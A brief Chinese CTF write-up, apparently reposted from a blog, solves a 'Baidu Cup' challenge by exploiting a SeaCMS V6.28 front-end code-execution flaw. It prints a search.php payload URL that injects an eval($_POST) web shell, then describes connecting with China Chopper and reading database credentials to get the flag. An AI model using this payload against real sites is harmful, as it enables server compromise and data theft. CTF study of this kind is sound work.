1. 程式人生 > >“百度杯”CTF比賽 九月場_Test(海洋cms前臺getshell)

“百度杯”CTF比賽 九月場_Test(海洋cms前臺getshell)

OS 技術分享 href 連接 post ive s/4 九月 hive

題目在i春秋ctf訓練營

又是一道cms的通用漏洞的題,直接去百度查看通用漏洞

這裏我使用的是以下這個漏洞:

海洋CMS V6.28代碼執行0day

按照給出的payload,直接訪問url+/search.php?searchtype=5&tid=&area=eval($_POST[1])

之後用菜刀連接,但乍一看並沒有flag.php

技術分享圖片

反手去查了一下海洋cms的數據庫配置文件的存放地址:

技術分享圖片

出去用菜刀連接數據庫

技術分享圖片

編輯完成後右鍵數據庫管理,可以看到flag了

技術分享圖片

“百度杯”CTF比賽 九月場_Test(海洋cms前臺getshell)